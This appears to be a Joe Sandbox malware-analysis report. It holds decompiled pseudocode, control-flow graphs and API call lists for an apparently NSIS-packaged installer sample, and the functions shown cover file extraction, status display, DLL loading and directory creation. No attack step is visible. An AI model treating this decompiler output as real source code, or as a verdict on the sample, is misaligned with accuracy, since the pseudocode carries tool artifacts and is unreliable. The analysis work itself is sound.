                                                control_flow_graph 791 40176f-401794 call 402da6 call 405e83 796 401796-40179c call 40653d 791->796 797 40179e-4017b0 call 40653d call 405e0c lstrcatW 791->797 802 4017b5-4017b6 call 4067c4 796->802 797->802 806 4017bb-4017bf 802->806 807 4017c1-4017cb call 406873 806->807 808 4017f2-4017f5 806->808 815 4017dd-4017ef 807->815 816 4017cd-4017db CompareFileTime 807->816 810 4017f7-4017f8 call 406008 808->810 811 4017fd-401819 call 40602d 808->811 810->811 818 40181b-40181e 811->818 819 40188d-4018b6 call 40559f call 4032b4 811->819 815->808 816->815 821 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 818->821 822 40186f-401879 call 40559f 818->822 833 4018b8-4018bc 819->833 834 4018be-4018ca SetFileTime 819->834 821->806 855 401864-401865 821->855 831 401882-401888 822->831 835 402c33 831->835 833->834 837 4018d0-4018db FindCloseChangeNotification 833->837 834->837 841 402c35-402c39 835->841 839 4018e1-4018e4 837->839 840 402c2a-402c2d 837->840 843 4018e6-4018f7 call 40657a lstrcatW 839->843 844 4018f9-4018fc call 40657a 839->844 840->835 850 401901-402398 843->850 844->850 853 40239d-4023a2 850->853 854 402398 call 405b9d 850->854 853->841 854->853 855->831 856 401867-401868 855->856 856->822
                                                C-Code - Quality: 75%
                                                			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                				void* __esi;
                                                				void* _t35;
                                                				void* _t43;
                                                				void* _t45;
                                                				FILETIME* _t51;
                                                				FILETIME* _t64;
                                                				void* _t66;
                                                				signed int _t72;
                                                				FILETIME* _t73;
                                                				FILETIME* _t77;
                                                				signed int _t79;
                                                				WCHAR* _t81;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t86;
                                                
                                                				_t77 = __ebx;
                                                				 *(_t86 - 8) = E00402DA6(0x31);
                                                				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                				_t35 = E00405E83( *(_t86 - 8));
                                                				_push( *(_t86 - 8));
                                                				_t81 = L"Call";
                                                				if(_t35 == 0) {
                                                					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
                                                				} else {
                                                					E0040653D();
                                                				}
                                                				E004067C4(_t81);
                                                				while(1) {
                                                					__eflags =  *(_t86 + 8) - 3;
                                                					if( *(_t86 + 8) >= 3) {
                                                						_t66 = E00406873(_t81);
                                                						_t79 = 0;
                                                						__eflags = _t66 - _t77;
                                                						if(_t66 != _t77) {
                                                							_t73 = _t66 + 0x14;
                                                							__eflags = _t73;
                                                							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                						__eflags = _t72;
                                                						 *(_t86 + 8) = _t72;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) == _t77) {
                                                						E00406008(_t81);
                                                					}
                                                					__eflags =  *(_t86 + 8) - 1;
                                                					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                					__eflags = _t43 - 0xffffffff;
                                                					 *(_t86 - 0x38) = _t43;
                                                					if(_t43 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) != _t77) {
                                                						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                						__eflags =  *(_t86 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                						__eflags =  *0x434f88;
                                                						goto L32;
                                                					} else {
                                                						E0040653D("C:\Users\engineer\AppData\Local\Temp\nss732B.tmp", _t83);
                                                						E0040653D(_t83, _t81);
                                                						E0040657A(_t77, _t81, _t83, "C:\Users\engineer\AppData\Local\Temp\nss732B.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                						E0040653D(_t83, "C:\Users\engineer\AppData\Local\Temp\nss732B.tmp");
                                                						_t64 = E00405B9D("C:\Users\engineer\AppData\Local\Temp\nss732B.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                						__eflags = _t64;
                                                						if(_t64 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t64 == 1;
                                                							if(_t64 == 1) {
                                                								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                								L32:
                                                								_t51 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(_t81);
                                                								_push(0xfffffffa);
                                                								E0040559F();
                                                								L29:
                                                								_t51 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
                                                					return _t51;
                                                				}
                                                				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                				 *0x434fb4 =  *0x434fb4 + 1;
                                                				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                				 *0x434fb4 =  *0x434fb4 - 1;
                                                				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                				_t84 = _t45;
                                                				if( *(_t86 - 0x24) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                				__eflags = _t84 - _t77;
                                                				if(_t84 >= _t77) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t84 - 0xfffffffe;
                                                					if(_t84 != 0xfffffffe) {
                                                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                					} else {
                                                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                						lstrcatW(_t81,  *(_t86 - 8));
                                                					}
                                                					_push(0x200010);
                                                					_push(_t81);
                                                					E00405B9D();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}


















                                                0x0040176f
                                                0x00401776
                                                0x00401782
                                                0x00401785
                                                0x0040178a
                                                0x0040178d
                                                0x00401794
                                                0x004017b0
                                                0x00401796
                                                0x00401797
                                                0x00401797
                                                0x004017b6
                                                0x004017bb
                                                0x004017bb
                                                0x004017bf
                                                0x004017c2
                                                0x004017c7
                                                0x004017c9
                                                0x004017cb
                                                0x004017d0
                                                0x004017d0
                                                0x004017db
                                                0x004017db
                                                0x004017ec
                                                0x004017ee
                                                0x004017ee
                                                0x004017ef
                                                0x004017ef
                                                0x004017f2
                                                0x004017f5
                                                0x004017f8
                                                0x004017f8
                                                0x004017ff
                                                0x0040180e
                                                0x00401813
                                                0x00401816
                                                0x00401819
                                                0x00000000
                                                0x00000000
                                                0x0040181b
                                                0x0040181e
                                                0x00401874
                                                0x00401879
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c2d
                                                0x00000000
                                                0x00401820
                                                0x00401826
                                                0x0040182d
                                                0x0040183a
                                                0x00401845
                                                0x0040185b
                                                0x0040185b
                                                0x0040185e
                                                0x00000000
                                                0x00401864
                                                0x00401864
                                                0x00401865
                                                0x00401882
                                                0x00402c33
                                                0x00402c33
                                                0x00402c33
                                                0x00401867
                                                0x00401867
                                                0x00401868
                                                0x00401493
                                                0x0040239d
                                                0x0040239d
                                                0x0040239d
                                                0x00401865
                                                0x0040185e
                                                0x00402c35
                                                0x00402c39
                                                0x00402c39
                                                0x00401892
                                                0x00401897
                                                0x004018a5
                                                0x004018aa
                                                0x004018b0
                                                0x004018b4
                                                0x004018b6
                                                0x004018be
                                                0x004018ca
                                                0x004018b8
                                                0x004018b8
                                                0x004018bc
                                                0x00000000
                                                0x00000000
                                                0x004018bc
                                                0x004018d3
                                                0x004018d9
                                                0x004018db
                                                0x00000000
                                                0x004018e1
                                                0x004018e1
                                                0x004018e4
                                                0x004018fc
                                                0x004018e6
                                                0x004018e9
                                                0x004018f2
                                                0x004018f2
                                                0x00401901
                                                0x00401906
                                                0x00402398
                                                0x00000000
                                                0x00402398
                                                0x00000000

                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000,?,76F1EA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000,?,76F1EA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00403418), ref: 004055FA
                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll), ref: 0040560C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nss732B.tmp$C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll$Call
                                                • API String ID: 1941528284-116249465
                                                • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 857 40559f-4055b4 858 4055ba-4055cb 857->858 859 40566b-40566f 857->859 860 4055d6-4055e2 lstrlenW 858->860 861 4055cd-4055d1 call 40657a 858->861 863 4055e4-4055f4 lstrlenW 860->863 864 4055ff-405603 860->864 861->860 863->859 867 4055f6-4055fa lstrcatW 863->867 865 405612-405616 864->865 866 405605-40560c SetWindowTextW 864->866 868 405618-40565a SendMessageW * 3 865->868 869 40565c-40565e 865->869 866->865 867->864 868->869 869->859 870 405660-405663 869->870 870->859
                                                C-Code - Quality: 100%
                                                			E0040559F(signed int _a4, WCHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				WCHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				WCHAR* _t27;
                                                				signed int _t28;
                                                				long _t29;
                                                				signed int _t37;
                                                				signed int _t38;
                                                
                                                				_t27 =  *0x433ee4;
                                                				_v8 = _t27;
                                                				if(_t27 != 0) {
                                                					_t37 =  *0x434fb4;
                                                					_v12 = _t37;
                                                					_t38 = _t37 & 0x00000001;
                                                					if(_t38 == 0) {
                                                						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                					}
                                                					_t27 = lstrlenW(0x42c248);
                                                					_a4 = _t27;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x42c248;
                                                							_v52 = 1;
                                                							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t38;
                                                							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                						}
                                                						if(_t38 != 0) {
                                                							_t28 = _a4;
                                                							0x42c248[_t28] = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t27 = lstrlenW(_a8) + _a4;
                                                						if(_t27 < 0x1000) {
                                                							_t27 = lstrcatW(0x42c248, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t27;
                                                			}

















                                                0x004055a5
                                                0x004055af
                                                0x004055b4
                                                0x004055ba
                                                0x004055c5
                                                0x004055c8
                                                0x004055cb
                                                0x004055d1
                                                0x004055d1
                                                0x004055d7
                                                0x004055df
                                                0x004055e2
                                                0x004055ff
                                                0x00405603
                                                0x0040560c
                                                0x0040560c
                                                0x00405616
                                                0x0040561f
                                                0x0040562b
                                                0x00405632
                                                0x00405636
                                                0x00405639
                                                0x0040564c
                                                0x0040565a
                                                0x0040565a
                                                0x0040565e
                                                0x00405660
                                                0x00405663
                                                0x00000000
                                                0x00405663
                                                0x004055e4
                                                0x004055ec
                                                0x004055f4
                                                0x004055fa
                                                0x00000000
                                                0x004055fa
                                                0x004055f4
                                                0x004055e2
                                                0x0040566f

                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000,?,76F1EA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000,?,76F1EA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00403418), ref: 004055FA
                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll), ref: 0040560C
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000), ref: 00406779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll
                                                • API String ID: 1495540970-3134395311
                                                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E735416BD(struct HINSTANCE__* _a4, short* _a8) {
                                                				_Unknown_base(*)()* _t7;
                                                				void* _t10;
                                                				int _t14;
                                                
                                                				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                				_t10 = GlobalAlloc(0x40, _t14);
                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                				_t7 = GetProcAddress(_a4, _t10); // executed
                                                				GlobalFree(_t10);
                                                				return _t7;
                                                			}






                                                0x735416d7
                                                0x735416e3
                                                0x735416f0
                                                0x735416f7
                                                0x73541700
                                                0x7354170c

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,735422D8,?,00000808), ref: 735416D5
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,735422D8,?,00000808), ref: 735416DC
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,735422D8,?,00000808), ref: 735416F0
                                                • GetProcAddress.KERNEL32(735422D8,00000000), ref: 735416F7
                                                • GlobalFree.KERNEL32 ref: 73541700
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.896849351.0000000073541000.00000020.00000001.01000000.00000004.sdmp, Offset: 73540000, based on PE: true
                                                • Associated: 00000000.00000002.896815263.0000000073540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896857446.0000000073544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896866612.0000000073546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73540000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID: Nv@hv
                                                • API String ID: 1148316912-4226514844
                                                • Opcode ID: 479bd6b94bea70d266b9abca782427c5bf472121b50f8ad2625b1efb3bec0067
                                                • Instruction ID: f5bad34c01a6c5af9452608dace68b2bb60882e1ced874b813063a21a7284faf
                                                • Opcode Fuzzy Hash: 479bd6b94bea70d266b9abca782427c5bf472121b50f8ad2625b1efb3bec0067
                                                • Instruction Fuzzy Hash: 8EF012731461387BD62026A78C4CD9B7E9CDF8B2F5B110211F61C9119087625C12D7F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 873 40689a-4068ba GetSystemDirectoryW 874 4068bc 873->874 875 4068be-4068c0 873->875 874->875 876 4068d1-4068d3 875->876 877 4068c2-4068cb 875->877 879 4068d4-406907 wsprintfW LoadLibraryExW 876->879 877->876 878 4068cd-4068cf 877->878 878->879
                                                C-Code - Quality: 100%
                                                			E0040689A(intOrPtr _a4) {
                                                				short _v576;
                                                				signed int _t13;
                                                				struct HINSTANCE__* _t17;
                                                				signed int _t19;
                                                				void* _t24;
                                                
                                                				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                				if(_t13 > 0x104) {
                                                					_t13 = 0;
                                                				}
                                                				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                					_t19 = 1;
                                                				} else {
                                                					_t19 = 0;
                                                				}
                                                				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                				return _t17;
                                                			}








                                                0x004068b1
                                                0x004068ba
                                                0x004068bc
                                                0x004068bc
                                                0x004068c0
                                                0x004068d3
                                                0x004068cd
                                                0x004068cd
                                                0x004068cd
                                                0x004068ec
                                                0x00406900
                                                0x00406907

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                • wsprintfW.USER32 ref: 004068EC
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406900
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 880 405a6e-405ab9 CreateDirectoryW 881 405abb-405abd 880->881 882 405abf-405acc GetLastError 880->882 883 405ae6-405ae8 881->883 882->883 884 405ace-405ae2 SetFileSecurityW 882->884 884->881 885 405ae4 GetLastError 884->885 885->883
                                                C-Code - Quality: 100%
                                                			E00405A6E(WCHAR* _a4) {
                                                				struct _SECURITY_ATTRIBUTES _v16;
                                                				struct _SECURITY_DESCRIPTOR _v36;
                                                				int _t22;
                                                				long _t23;
                                                
                                                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                				_v36.Owner = 0x4083f8;
                                                				_v36.Group = 0x4083f8;
                                                				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                				_v16.lpSecurityDescriptor =  &_v36;
                                                				_v36.Revision = 1;
                                                				_v36.Control = 4;
                                                				_v36.Dacl = 0x4083e8;
                                                				_v16.nLength = 0xc;
                                                				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                				if(_t22 != 0) {
                                                					L1:
                                                					return 0;
                                                				}
                                                				_t23 = GetLastError();
                                                				if(_t23 == 0xb7) {
                                                					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                						goto L1;
                                                					}
                                                					return GetLastError();
                                                				}
                                                				return _t23;
                                                			}







                                                0x00405a79
                                                0x00405a7d
                                                0x00405a80
                                                0x00405a86
                                                0x00405a8a
                                                0x00405a8e
                                                0x00405a96
                                                0x00405a9d
                                                0x00405aa3
                                                0x00405aaa
                                                0x00405ab1
                                                0x00405ab9
                                                0x00405abb
                                                0x00000000
                                                0x00405abb
                                                0x00405ac5
                                                0x00405acc
                                                0x00405ae2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ae4
                                                0x00405ae8

                                                APIs
                                                • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                • GetLastError.KERNEL32 ref: 00405AC5
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                • GetLastError.KERNEL32 ref: 00405AE4
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3449924974-3936084776
                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
